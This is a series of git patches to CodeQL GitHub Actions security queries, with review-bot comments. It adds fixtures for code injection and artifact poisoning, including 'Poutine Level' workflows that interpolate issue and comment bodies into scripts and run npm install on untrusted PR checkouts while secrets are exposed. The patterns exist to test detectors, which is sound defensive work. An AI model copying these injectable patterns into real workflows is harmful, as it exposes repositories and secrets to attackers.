@@ -666,6 +666,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } + + /** Get condition scalar style. */ + string getConditionStyle() { result = n.(YamlScalar).getStyle() } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql new file mode 100644 index 000000000000..0a951cbabe1a --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -0,0 +1,24 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @security-severity 9.0 + * @problem.severity error + * @precision high + * @id actions/if-expression-always-true + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from If i +where + i.getConditionStyle() = ["|", ">"] + or + i.getCondition().matches("%${{%") and + not i.getCondition().matches("${{%") + or + count(i.getCondition().splitAt("${{")) > 2 +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml new file mode 100644 index 000000000000..16b725b5ee8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml 
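Review bot: The metadata of ExpressionIsAlwaysTrue.ql is inconsistent with where the query lives: the file sits under CWE-571 and is named for an always-true expression, yet the tag line reads `external/cwe/cwe-275`; it should be `external/cwe/cwe-571`. It also declares `@security-severity 9.0` while the tags are only `actions` and `maintainability`; if code scanning is meant to honour that severity, the `security` tag is normally needed as well. The second disjunct only checks that the condition does not start with `${{`, so a value with trailing text after the closing `}}` (for example `${{ false }} x`) is not reported although the template is then no longer a bare expression; if the runner treats that the same way as a leading space, a symmetric check such as `i.getCondition().matches("%${{%") and not i.getCondition().matches("%}}")` would close the gap. The `@description` mentions only extra spaces, whereas the query also covers block scalars and multiple `${{` occurrences.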
@@ -0,0 +1,60 @@ +name: Conditionally process PR + +on: + pull_request_target: + types: [opened, synchronize, reopened] + +jobs: + process-pr: + runs-on: ubuntu-latest + steps: + - name: Test1 + if: 1 == 2 + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ 1 == 2 }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ 1 == 2 }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ 1 == 2 }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + 1 == 2 || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + 1 == 2 || + 3 == 4 }} + - name: Test 9 + if: '${{ 1 == 2 }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{1 == 2 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ 1 == 2 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ 1 == 2 }}" + run: echo "Test 12 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref new file mode 100644 index 000000000000..01235fb6a202 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrue.ql From 7a8af5e8ea1c5697dfff38ff5e4d0475f1fd038a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:35 +0200 Subject: [PATCH 203/707] Additional sources --- .../codeql/actions/dataflow/FlowSources.qll | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) 
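Review bot: The new CWE-571 test directory gets this workflow fixture and an `ExpressionIsAlwaysTrue.qlref`, but according to the commit's diffstat no `ExpressionIsAlwaysTrue.expected`; with the CodeQL test runner that presumably leaves the test failing until the expected output is recorded. Test 4 duplicates Test 3 and Test 12 duplicates Test 11 byte for byte, so each pair adds no coverage; turning one of each into another variant (for instance a trailing-space condition `"${{ 1 == 2 }} "`) would exercise a branch the query does not yet check. A short comment at the top of the fixture saying which step numbers are expected to be reported would make the `.expected` file easier to review once it lands.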
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c937aaa550b9..0dc376765a8a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -120,12 +120,30 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } +bindingset[context] +private predicate isExternalUserControlledRepositoryDispatch(string context) { + exists(string reg | + reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowDispatch(string context) { + exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | @@ -137,7 +155,9 @@ private class EventSource extends RemoteFlowSource { isExternalUserControlledGollum(context) or isExternalUserControlledCommit(context) or isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + isExternalUserControlledWorkflowRun(context) or + isExternalUserControlledRepositoryDispatch(context) or + isExternalUserControlledWorkflowDispatch(context) ) } From d504cd9b4d5c36ba1146d3b73acef52d801fad54 Mon Sep 17 00:00:00 2001 
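Review bot: The two new predicates match `github.event.client_payload` and `github.event.inputs` either bare or with a numeric index (`\\[[0-9]+\\]`), but both contexts are objects whose members are read as `github.event.inputs.name` or `github.event.inputs['name']`, and neither form is covered unless `Utils::wrapRegexp` (not visible here) already permits a trailing member access; the neighbouring patterns in `isExternalUserControlledWorkflowRun` are full dotted paths, which suggests it does not. If so, the index alternative should become something like `"github\\.event\\.inputs(\\.[a-zA-Z0-9_-]+|\\['[^']+'\\])?"`, and likewise for `client_payload`. It is also worth recording in a QLDoc comment on each predicate that `workflow_dispatch` inputs and `repository_dispatch` payloads can only be supplied by a principal with write access or an authorised token, so these are lower-confidence "external user" sources than the pull-request and issue contexts above them, and downstream queries may want to distinguish them. Whether the bare `inputs.*` context used by `workflow_dispatch` is handled elsewhere cannot be told from this hunk.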
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:20:09 +0200 Subject: [PATCH 204/707] Better detection of poisonable steps --- .../security/ArtifactPoisoningQuery.qll | 53 ++++++- .../CWE-094/.github/workflows/level0.yml | 135 +++++++++++++++++ .../CWE-094/.github/workflows/level1.yml | 37 +++++ .../Security/CWE-094/CodeInjection.expected | 3 + .../CWE-094/PrivilegedCodeInjection.expected | 6 + .../.github/workflows/artifactpoisoning34.yml | 25 ++++ .../CWE-829/.github/workflows/level0.yml | 136 ++++++++++++++++++ .../.github/workflows/untrusted_checkout.yml | 7 + .../CWE-829/ArtifactPoisoning.expected | 3 + .../PrivilegedArtifactPoisoning.expected | 4 + .../CWE-829/UnpinnedActionsTag.expected | 1 + .../CWE-829/UntrustedCheckout.expected | 4 +- 12 files changed, 406 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d5c1567f8a5d..95dc22a40def 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -230,16 +230,55 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { abstract class PoisonableStep extends Step { } -class CommandExecutionRunStep extends PoisonableStep, Run { - CommandExecutionRunStep() { +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 +private string dangerousActions() { + result = + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] +} + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + this.getCallee() = dangerousActions() + ) + } +} + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 +private string dangerousCommands() { + result = + [ + "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", + "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", + "^ant ", "mkdocs build", "pytest" + ] +} + +class BuildRunStep extends PoisonableStep, Run { + BuildRunStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + exists( + this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) + ) + ) + } +} + +class LocalCommandExecutionRunStep extends PoisonableStep, Run { + LocalCommandExecutionRunStep() { exists(UntrustedArtifactDownloadStep step | step.getAFollowingStep() = this and // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... - // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... - this.getScript() - .trim() - .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + // Run step with a command starting with `./xxxx`, `sh xxxx`, ... 
+ exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _) + ) ) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml new file mode 100644 index 000000000000..ad9187a3d6bf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml 
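Review bot: `LocalCommandExecutionRunStep` still concatenates `step.getPath()` unescaped into the regex handed to `regexpFind`, so a download path containing regex metacharacters (a `.` in `foo.zip` matches any character; `+`, `(` or `[` would alter or break the pattern) is not matched literally — the path should be regex-escaped before concatenation, and for the same reason the `./` in `(./|(ba|z|fi)?sh\\s+)` and in the `"./mvnw "`/`"./gradlew "` entries should be `\\./`. The rewrite also drops the `node|python|ruby` interpreter alternatives that the removed line had, so `node test.js` or `python run.py` on an untrusted artifact is no longer a poisonable step; if that narrowing is intended it deserves a comment, otherwise keep them in the alternation. In `dangerousCommands()`, `"pytest"` has no trailing delimiter (compare `"npm ci(\\b|$)"`), so any line that merely mentions it, such as `pip install pytest`, is flagged. The `^` inside `"^ant "` is redundant with the `([^a-z]|^)` prefix the caller prepends, since `[^a-z]^` can never match.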
@@ -0,0 +1,135 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. 
Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml new file mode 100644 index 000000000000..826051dfc5ac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml 
@@ -0,0 +1,37 @@ +name: Poutine Level 1 +on: + workflow_run: + workflows: ["Poutine Level 0"] + types: + - completed + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + toppings-for-realz: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'workflow_run' && github.event.workflow_run.event == 'pull_request' + permissions: + id-token: write + contents: write + pull-requests: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: actions/first-interaction@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + issue-message: 'Message that will be displayed on users first issue' + pr-message: 'Message that will be displayed on users first pr' + - name: Log test executions + run: | + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index f242e0e9e689..785aaa383eb3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ec9a5e5238a9..5b2dac260ded 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -269,6 +272,9 @@ subpaths | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml new file mode 100644 index 000000000000..905a4eaccb17 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml new file mode 100644 index 000000000000..49908b7b4c51 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml 
@@ -0,0 +1,136 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. 
Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 6bcdcbb4291c..1160497a4a38 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml 
@@ -13,3 +13,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 99f9fb0e5407..429a4cdc0c5b 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | 
